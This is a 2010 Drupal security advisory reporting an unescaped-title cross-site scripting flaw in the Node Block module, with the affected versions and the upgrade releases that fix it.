Drupal Association members fund grants that make connections all over the world.
- Advisory ID: DRUPAL-SA-CONTRIB-2010-004
- Project: Node Block (third-party module)
- Version: 6.13, 5.11
- Date: 2010-January-13
- Security risk: Moderately critical
- Exploitable from: Remote
- Vulnerability: Cross Site Scripting
This module allows you to specify content type(s) as being a block. This allows the content managers of the site to edit the block text and title without having to access the block administration page. Users only need edit access to that node in order to edit it. Users with administer block access will see region and weight options on the node form.
The Node Block module creates a block from specified content type(s). Node block doesn't properly escape titles allowing users with permissions to create/edit the specified content type(s) to inject arbitrary code into the site. Such a cross site scripting (XSS) attack may lead to a malicious user gaining full administrative access.
- Node Blocks module 5.x-1.1 and prior versions
- Node Blocks module 6.x-1.3 and prior versions
Drupal core is not affected. If you do not use the contributed Feed Block module, there is nothing you need to do.
Install the latest version:
- If you use the Node Blocks module for Drupal 5.x upgrade to Node Blocks 5.x-1.2
- If you use the Node Blocks module for Drupal 6.x upgrade to Node Blocks 6.x-1.4
See also the Node Block project page.
The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.